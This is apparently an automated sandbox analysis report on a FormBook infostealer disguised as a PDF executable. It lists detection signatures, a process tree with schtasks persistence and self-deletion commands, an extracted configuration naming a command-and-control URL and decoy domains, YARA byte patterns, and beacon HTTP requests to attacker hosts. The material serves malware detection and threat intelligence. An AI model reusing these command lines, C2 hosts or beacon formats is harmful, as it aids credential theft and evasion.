
Analysis Report INQUIRY 1820521 pdf.exe

Overview

General Information

Sample Name: INQUIRY 1820521 pdf.exe
Analysis ID: 385289
MD5: dd3ae15e952c239ae6d87c8374b3b460
SHA1: f8d9daceb3ff1dadabf9051a04bb4356c370fbde
SHA256: 513357be2837bb1211c3fe2a32d7e6cdecf75f6cf0da1c2f0d198a38e3cdb759
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • INQUIRY 1820521 pdf.exe (PID: 6928 cmdline: 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe' MD5: DD3AE15E952C239AE6D87C8374B3B460)
    • schtasks.exe (PID: 7156 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INQUIRY 1820521 pdf.exe (PID: 2848 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)
    • INQUIRY 1820521 pdf.exe (PID: 1848 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)
    • INQUIRY 1820521 pdf.exe (PID: 1496 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)
    • INQUIRY 1820521 pdf.exe (PID: 1664 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6816 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • ipconfig.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6852 cmdline: /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.auggiepaws.com/gnk/"], "decoy": ["fotografialove.com", "drphoenixnguyen.com", "pueblobusinessreview.com", "voteorrall.com", "sailde.com", "active-label.com", "geteless.com", "aperfectbrow.com", "interdictrisk.com", "sakaisays.com", "wyshio.com", "nilantika.com", "landbirdevehicals.com", "vd-bill.com", "ourblingstore.com", "dennites.xyz", "styleformen.online", "adjustedhuman.com", "soglasi.com", "abarroteslacanasta.com", "ylsjsj.com", "carrieroerealtor.com", "2739kingsroad.com", "farmersmeadow.com", "domokoi.com", "lownak.com", "extrarenda.com", "watchcure.com", "yrzx61.com", "boon-bliss.com", "xinghai-nb.com", "perencanaan.net", "queenbeadsandcrafts.com", "capitalcourierltd.online", "yoopadoop.com", "crlspn.com", "sxpyx.com", "rva80s.com", "fuelupllc.com", "mobcitylabs.com", "madebyhidden.com", "bazmemohsin.com", "gosvozvrat-nds.xyz", "rescueranchaz.com", "hhcuerkn.com", "maginames.com", "avkulrestaurant.com", "autofestva.com", "lifeprotectionexpert.com", "shakamaui.com", "demo-berlin.com", "namigweart.com", "thesimpleau.com", "cmchickengt.com", "yourofficespot.com", "areyssg.com", "shanscorp.com", "cozywag.com", "shrikrishnasevasenai.com", "homartist.net", "ferreteriablanco.com", "xczg99999.com", "studyabroadguatemala.com", "britishvapecompany.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe', ParentImage: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe, ParentProcessId: 6928, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', ProcessId: 7156

Signature Overview


AV Detection:

Found malware configuration
Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.auggiepaws.com/gnk/"], "decoy": ["fotografialove.com", "drphoenixnguyen.com", "pueblobusinessreview.com", "voteorrall.com", "sailde.com", "active-label.com", "geteless.com", "aperfectbrow.com", "interdictrisk.com", "sakaisays.com", "wyshio.com", "nilantika.com", "landbirdevehicals.com", "vd-bill.com", "ourblingstore.com", "dennites.xyz", "styleformen.online", "adjustedhuman.com", "soglasi.com", "abarroteslacanasta.com", "ylsjsj.com", "carrieroerealtor.com", "2739kingsroad.com", "farmersmeadow.com", "domokoi.com", "lownak.com", "extrarenda.com", "watchcure.com", "yrzx61.com", "boon-bliss.com", "xinghai-nb.com", "perencanaan.net", "queenbeadsandcrafts.com", "capitalcourierltd.online", "yoopadoop.com", "crlspn.com", "sxpyx.com", "rva80s.com", "fuelupllc.com", "mobcitylabs.com", "madebyhidden.com", "bazmemohsin.com", "gosvozvrat-nds.xyz", "rescueranchaz.com", "hhcuerkn.com", "maginames.com", "avkulrestaurant.com", "autofestva.com", "lifeprotectionexpert.com", "shakamaui.com", "demo-berlin.com", "namigweart.com", "thesimpleau.com", "cmchickengt.com", "yourofficespot.com", "areyssg.com", "shanscorp.com", "cozywag.com", "shrikrishnasevasenai.com", "homartist.net", "ferreteriablanco.com", "xczg99999.com", "studyabroadguatemala.com", "britishvapecompany.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe | ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: INQUIRY 1820521 pdf.exe | Virustotal: Detection: 39%
Source: INQUIRY 1820521 pdf.exe | Metadefender: Detection: 13%
Source: INQUIRY 1820521 pdf.exe | ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: INQUIRY 1820521 pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: INQUIRY 1820521 pdf.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb | source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL | source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: INQUIRY 1820521 pdf.exe, ipconfig.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 4x nop then pop esi | 9_2_004172EA
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe | Code function: 4x nop then pop edi | 9_2_00416C96
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop esi | 16_2_00A172EA
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi | 16_2_00A16C96

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.auggiepaws.com/gnk/
Source: global traffic | HTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1 | Host: www.hhcuerkn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1 | Host: www.mobcitylabs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1 | Host: www.xinghai-nb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 198.185.159.144
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: IDCFIDCFrontierIncJP
Source: C:\Windows\explorer.exe | Code function: 10_2_04DFB782 getaddrinfo,setsockopt,recv, | 10_2_04DFB782
Source: global traffic | HTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1 | Host: www.hhcuerkn.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1 | Host: www.mobcitylabs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1 | Host: www.xinghai-nb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.hhcuerkn.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp | String found in binary or memory: http://en.wikip
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000002.681042988.0000000003121000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: INQUIRY 1820521 pdf.exe | String found in binary or memory: http://weather.gc.ca/astro/seeing_e.html)
Source: explorer.exe, 0000000A.00000002.909308759.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com11
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.com?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTC
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comTCV
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.come7
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coms-c
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.651191297.000000000868E000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.c
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn0A
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnCg
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnD
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnP
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647266371.000000000868A000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cna
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnl
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnu-e
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.c~
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr-e
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.krs-cz
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.651699352.0000000008690000.00000004.00000001.sdmp | String found in binary or memory: http://www.monotype.5;M
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krim
Source: explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comTZ
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.coms
